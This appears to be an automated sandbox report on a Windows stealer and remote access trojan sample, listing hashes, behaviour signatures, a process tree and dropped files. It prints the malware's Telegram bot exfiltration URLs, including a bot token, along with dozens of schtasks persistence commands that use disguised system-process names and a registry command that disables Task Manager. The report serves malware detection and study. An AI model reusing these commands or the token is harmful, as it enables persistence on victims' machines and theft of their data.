Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2024 23:13

General

  • Target

    1.exe

  • Size

    2.5MB

  • MD5

    a13b59f33063b970d7adbe2a23fb5a81

  • SHA1

    7a8f1204af663a38f87816c528e27137f310ae42

  • SHA256

    9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946

  • SHA512

    6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f

  • SSDEEP

    49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ZTSLLRFH%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Cbrowserperf%5Csysmon.ex

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A38.392558

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A11.283864

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 17 IoCs
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 32 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 10 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\browserperf\DnCoBuHIAvg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\browserperf\RcA8rkUQUHdsADqQUNtkjn.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3628
        • C:\browserperf\BlockDriversession.exe
          "C:\browserperf\BlockDriversession.exe"
          4⤵
          • Modifies WinLogon for persistence
          • UAC bypass
          • Drops file in Drivers directory
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:1508
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DgHlPzdV8W.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4828
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:3772
              • C:\browserperf\sysmon.exe
                "C:\browserperf\sysmon.exe"
                6⤵
                • UAC bypass
                • Checks computer location settings
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Modifies registry class
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:416
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02a6598c-5b1d-4613-975d-28dd77e56082.vbs"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4584
                  • C:\browserperf\sysmon.exe
                    C:\browserperf\sysmon.exe
                    8⤵
                    • UAC bypass
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Modifies registry class
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    • System policy modification
                    PID:1224
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f4171b3-058b-4288-8dc4-85946c3d3649.vbs"
                      9⤵
                        PID:284
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbf30c07-3da3-4ecc-8cbd-a9b05ca87505.vbs"
                        9⤵
                          PID:4224
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1643e7d5-e16c-4687-846d-a0757bf86570.vbs"
                      7⤵
                        PID:3000
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zfOrxS71E3.bat"
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:692
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          8⤵
                            PID:3592
                          • C:\browserperf\sysmon.exe
                            "C:\browserperf\sysmon.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1992
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r0MODpJtud.bat"
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2960
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            8⤵
                              PID:3544
                            • C:\browserperf\sysmon.exe
                              "C:\browserperf\sysmon.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1428
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QsS2ZSeOHk.bat"
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:844
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              8⤵
                                PID:3512
                              • C:\browserperf\sysmon.exe
                                "C:\browserperf\sysmon.exe"
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1408
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eoRA4B8PWR.bat"
                              7⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3460
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                8⤵
                                  PID:3380
                                • C:\browserperf\sysmon.exe
                                  "C:\browserperf\sysmon.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2276
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zlYgv4zteq.bat"
                                7⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5072
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  8⤵
                                    PID:4520
                                  • C:\browserperf\sysmon.exe
                                    "C:\browserperf\sysmon.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:632
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rBMLF9HJtT.bat"
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4468
                                  • C:\Windows\system32\w32tm.exe
                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    8⤵
                                      PID:5040
                                    • C:\browserperf\sysmon.exe
                                      "C:\browserperf\sysmon.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4052
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YeeJHhLP1x.bat"
                                    7⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3892
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      8⤵
                                        PID:1068
                                      • C:\browserperf\sysmon.exe
                                        "C:\browserperf\sysmon.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4788
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5wLWjZnu9K.bat"
                                      7⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:388
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        8⤵
                                          PID:2816
                                        • C:\browserperf\sysmon.exe
                                          "C:\browserperf\sysmon.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4296
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry key
                                  PID:1660
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2932
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2396
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1852
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2220
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4060
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4584
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2936
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2364
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4796
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1472
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2876
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4500
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4448
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2244
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2552
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\browserperf\sysmon.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4112
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3728
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4004
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2804
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2404
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3636
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\browserperf\upfc.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1068
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4932
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1292
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\lsass.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3804
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4536
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2568
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\browserperf\dllhost.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4788
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3424
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1492
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\browserperf\unsecapp.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1992
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3976
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:5012
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1392
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3752
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1736
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2904
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4196
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3236
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1044
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversession" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2060
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3404
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:976
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1428
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1612
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\en-US\dwm.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:216
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4052
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2716
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Idle.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3488
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4828
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:64
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3780
                          • C:\Windows\system32\wbem\WmiApSrv.exe
                            C:\Windows\system32\wbem\WmiApSrv.exe
                            1⤵
                              PID:692
                            • C:\Windows\system32\wbem\WmiApSrv.exe
                              C:\Windows\system32\wbem\WmiApSrv.exe
                              1⤵
                                PID:2592

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Recovery\WindowsRE\RuntimeBroker.exe

                                Filesize

                                2.2MB

                                MD5

                                434137b47c58cd2fe43ac11c4ca57d5e

                                SHA1

                                f17ed590355e712ffb46fbcf6c336d631e32b9bc

                                SHA256

                                ac77250c3cf3f478d8c264221dca59315f9a960891b868e4bb1f2e828d5999f0

                                SHA512

                                76854bce72e876c96511dccfab1251afab814fb2befcfc2d3f3e101de675d66c9885cae884ab7af62f7c195f825558b52329b683cfc6f6311da7ff528dfa1bdc

                              • C:\Users\Admin\3D Objects\sppsvc.exe

                                Filesize

                                2.2MB

                                MD5

                                0a2d7f0801cf45923878c7d9adf0d93f

                                SHA1

                                8803bcf53ee79ed739fa533eb16ebe6e94213756

                                SHA256

                                b95abda288cf2017789151be02cebef9ac5c3f65a2c9b944abb78cb2c11b2160

                                SHA512

                                682b1fa705e08356ee3829cee220d57655e5fe08cb0e857ad5cefdcb158f360b0206ccae26003c978d8c34c5979d16e1571ffc0d50c4b3ae2f7b2ee2320297e1

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sysmon.exe.log

                                Filesize

                                1KB

                                MD5

                                dbe63509a4414a1b42de4e989eaa127a

                                SHA1

                                f108870e9963812f7cf20f284157c10649236557

                                SHA256

                                7457812f3d13a281c9035c5276a186d9ffee2d6d3ffa28fbb27aaa6f3524305a

                                SHA512

                                5515396cf904c2d26377834d3f8770b69a814a1e065d4a4f88d10a76f98c0bbb6302bc1d04faa5cc49f39667707219164eea2c8e0d670f0f9e5a85f1f93f23c2

                              • C:\Users\Admin\AppData\Local\Temp\02a6598c-5b1d-4613-975d-28dd77e56082.vbs

                                Filesize

                                700B

                                MD5

                                7f421413a3a37b7165efde5c994a54f0

                                SHA1

                                c8d27a7bd60a62763eec31af7803104219330878

                                SHA256

                                6bdef59ce5299cd28eb10dadc036161b8f4d0a11c384aeeb88a6b7ddee404a26

                                SHA512

